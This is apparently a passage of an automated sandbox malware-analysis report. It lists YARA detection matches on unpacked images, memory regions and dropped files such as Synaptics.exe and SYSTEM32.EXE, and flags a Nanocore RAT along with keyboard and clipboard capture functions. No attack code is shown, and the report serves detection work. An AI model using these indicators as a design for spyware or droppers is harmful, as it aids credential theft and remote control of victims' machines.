            Source: Yara matchFile source: 4.2.y8kdmHi6x3.exe.4c4d1c.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.Synaptics.exe.4b8e54.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4c4d1c.17.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4c4d1c.27.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.2.Synaptics.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4c4d1c.18.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4b8e54.23.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.3e27d70.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.28.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.46e7d70.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4c4d1c.17.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.4cbff6c.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.Synaptics.exe.4b8e54.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4c4d1c.22.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.Synaptics.exe.4b8e54.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.4cb40a4.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.SYSTEM32.EXE.da0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.Synaptics.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.45da750.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.31.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4c4d1c.33.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4c4d1c.22.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4c4d1c.23.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.40cf190.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.0.._cache_y8kdmHi6x3.exe.3cf0c8.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.2.Synaptics.exe.4b8e54.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.y8kdmHi6x3.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.45fff6c.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.46d40a4.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.44fa750.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4c4d1c.22.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.._cache_y8kdmHi6x3.exe.3cf0c8.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.3f07d70.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.Synaptics.exe.4c4d1c.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.0.._cache_y8kdmHi6x3.exe.3c0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.12.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.34.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.23.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.y8kdmHi6x3.exe.4b8e54.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.46d40a4.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.4eb40a4.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.Synaptics.exe.4b8e54.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.26.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.46af190.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.45f40a4.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.44e7d70.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4b8e54.23.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.21.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.0.._cache_y8kdmHi6x3.exe.3cf0c8.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4c4d1c.18.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.46dff6c.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.4ebff6c.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4c4d1c.23.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4b8e54.24.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.14.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.48af190.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.4eb40a4.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.4dba750.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.4320940.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.4bba750.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.3c60940.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.3d40940.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.4520940.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.558804825.0000000000DA2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000002.401049585.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000000.401578463.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000000.404128666.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000024.00000000.426967542.0000000000842000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000000.392435877.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000000.403770740.0000000000862000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000000.420990382.00000000000FF000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000000.388059549.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000024.00000002.442628618.0000000000842000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000002.431447633.00000000000FF000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000000.390475509.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000019.00000002.413670718.0000000000382000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000002.425456929.0000000000862000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.386810827.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.422157438.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.384287270.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.526679054.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000000.400361614.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000002.406913050.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.326093400.0000000003A99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.429485363.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.443173289.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.317487314.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.327639082.0000000000DA2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.323345675.00000000003CF000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.401818941.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000019.00000000.395835615.0000000000382000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.329527934.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.316599175.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.392491539.0000000004159000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.427064129.0000000004359000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.404592341.0000000004B59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.434303523.0000000004D59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.423679022.0000000004579000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.330915609.0000000004499000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.401697054.0000000003B79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: y8kdmHi6x3.exe PID: 5268, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: y8kdmHi6x3.exe PID: 4844, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: ._cache_y8kdmHi6x3.exe PID: 6232, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: SYSTEM32.EXE PID: 6952, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 6964, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 4928, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 6632, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 5684, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 4964, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 5976, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\Desktop\SYSTEM32.EXE, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe, type: DROPPED
            Source: Yara matchFile source: C:\ProgramData\Synaptics\._cache_Synaptics.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\Desktop\._cache_Synaptics.exe, type: DROPPED
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_0043C1FC GetKeyboardState,4_2_0043C1FC
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_004289FC GetClipboardData,CopyEnhMetaFileA,GetEnhMetaFileHeader,4_2_004289FC
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_00429040 GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette,4_2_00429040
            Source: ._cache_WINDOWS.EXE, 0000000B.00000002.562480973.00000000059E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: RegisterRawInputDevices

            E-Banking Fraud

            barindex
            Yara detected Nanocore RAT
            Source: Yara matchFile source: 11.0.._cache_WINDOWS.EXE.5b0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 16.2.._cache_WINDOWS.EXE.d70000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.Synaptics.exe.584130.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 16.0.._cache_WINDOWS.EXE.d70000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.584130.24.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 16.2.._cache_WINDOWS.EXE.437ebcc.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.584130.29.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.584130.22.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.584130.18.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.4dba750.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.._cache_y8kdmHi6x3.exe.48e4dc.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.._cache_WINDOWS.EXE.59e0000.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.584130.17.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4c4d1c.17.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.Synaptics.exe.584130.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.23.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.0.._cache_y8kdmHi6x3.exe.48e4dc.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.2.Synaptics.exe.4b8e54.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4c4d1c.23.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.0.WINDOWS.EXE.4b8e14.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.._cache_WINDOWS.EXE.5b0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.4cb40a4.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.2.dhcpmon.exe.46231f5.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.584130.18.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.2.Synaptics.exe.584130.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.584130.22.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.584130.18.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.584130.32.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.y8kdmHi6x3.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.y8kdmHi6x3.exe.4b8e54.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.16.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.28.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4b8e54.24.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.45f40a4.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4c4d1c.22.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4b8e54.24.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4b8e54.19.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4c4d1c.27.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4b8e54.19.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.44fa750.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4c4d1c.17.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.34.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.._cache_y8kdmHi6x3.exe.3c0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.Synaptics.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.0.._cache_y8kdmHi6x3.exe.48e4dc.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4b8e54.24.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.WINDOWS.EXE.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.Synaptics.exe.4b8e54.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 16.2.._cache_WINDOWS.EXE.437ebcc.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.2.Synaptics.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4b8e54.23.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.._cache_WINDOWS.EXE.3bdebcc.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.28.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.584130.29.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.0.dhcpmon.exe.e20000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.584130.24.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.._cache_WINDOWS.EXE.3be31f5.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.y8kdmHi6x3.exe.584130.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.0.WINDOWS.EXE.4b8e14.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4c4d1c.17.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.584130.24.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.4cbff6c.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.Synaptics.exe.4b8e54.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.2.dhcpmon.exe.4619d96.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.Synaptics.exe.4b8e54.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.4cb40a4.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.Synaptics.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.2.dhcpmon.exe.461ebcc.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.Synaptics.exe.584130.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.y8kdmHi6x3.exe.584130.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.._cache_WINDOWS.EXE.3bd9d96.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.45da750.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.31.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4c4d1c.33.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.584130.24.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4c4d1c.22.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.0.._cache_y8kdmHi6x3.exe.3cf0c8.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.2.Synaptics.exe.4b8e54.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.584130.18.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.y8kdmHi6x3.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.584130.17.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.45fff6c.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.46d40a4.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.._cache_WINDOWS.EXE.59e0000.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.44fa750.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.._cache_y8kdmHi6x3.exe.3cf0c8.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 16.2.._cache_WINDOWS.EXE.4379d96.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.584130.18.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.584130.18.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.584130.22.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.._cache_y8kdmHi6x3.exe.48e4dc.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.0.._cache_y8kdmHi6x3.exe.3c0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 16.2.._cache_WINDOWS.EXE.43831f5.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.45da750.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.12.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.WINDOWS.EXE.4b8e14.1.raw.unpack, type: UNPACKEDPE
